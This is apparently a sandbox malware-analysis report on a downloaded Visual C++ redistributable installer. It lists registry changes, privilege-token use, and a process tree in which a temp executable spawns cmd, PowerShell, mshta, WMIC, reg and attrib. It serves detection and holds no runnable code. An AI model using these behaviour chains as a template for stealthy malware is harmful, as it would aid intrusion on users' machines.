Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{95F0B3BE-E8AC-4995-9DCA-419849E06410}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E9E074EA-BA0A-11D1-B137-0000F8753F5D}\TypeLib\Version = "2.0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{95F0B3BE-E8AC-4995-9DCA-419849E06410}\ToolboxBitmap32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{62B025F5-F551-44A9-8BA8-0118EFB9127C}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{9ED94440-E5E8-101B-B9B5-444553540000}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39977C62-C383-463D-AF61-C71220634656}\Implemented Categories C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E9E07513-BA0A-11D1-B137-0000F8753F5D}\TypeLib\ = "{65E121D4-0C60-11D2-A9FC-0000F8754DA1}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5ACBB958-5C57-11CF-8993-00AA00688B10}\ = "ListView Columns Property Page Object" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{99E0D1EC-0A0D-4E50-B8A1-82A8B6ECE5CB} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F09D237B-3FD1-4900-BEF2-3471CA68142D}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1D5E3C0FEDA1E123187686FED06E995A\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{78E93844-85FD-11D0-8487-00A0C90DC8A9}\TypeLib C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{38911D96-E448-11D0-84A3-00DD01104159}\ = "__CoolBar" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{586A6352-87C8-11D1-8BE3-0000F8754DA1}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2334D2B1-713E-11CF-8AE5-00AA00C00905}\TypeLib C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E9E074E2-BA0A-11D1-B137-0000F8753F5D}\TypeLib\ = "{65E121D4-0C60-11D2-A9FC-0000F8754DA1}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{6B7E63A3-850A-101B-AFC0-4210102A8DA7} C:\Windows\system32\msiexec.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\VisualCppRedist_AIO_x86_x64.exe:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\VisualCppRedist_AIO_x86_x64.exe N/A
N/A N/A C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe N/A
N/A N/A C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe N/A
N/A N/A C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe N/A
N/A N/A C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe N/A
N/A N/A C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\vcredist_x86.exe N/A
N/A N/A C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\vcredist_x86.exe N/A
N/A N/A C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe N/A
N/A N/A C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe N/A
N/A N/A C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe N/A
N/A N/A C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe N/A
N/A N/A C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe N/A
N/A N/A C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe N/A
N/A N/A C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe N/A
N/A N/A C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3976 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe
PID 3976 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe
PID 2244 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 4076 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4076 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1440 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1440 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 2244 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 1444 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1444 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1028 wrote to memory of 3108 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1028 wrote to memory of 3108 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2244 wrote to memory of 4140 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2244 wrote to memory of 4140 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4140 wrote to memory of 4476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4140 wrote to memory of 4476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2244 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 4192 wrote to memory of 3796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4192 wrote to memory of 3796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2244 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2092 wrote to memory of 1376 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2092 wrote to memory of 1376 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2244 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2404 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2404 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2244 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 976 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 976 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3404 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3404 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2244 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
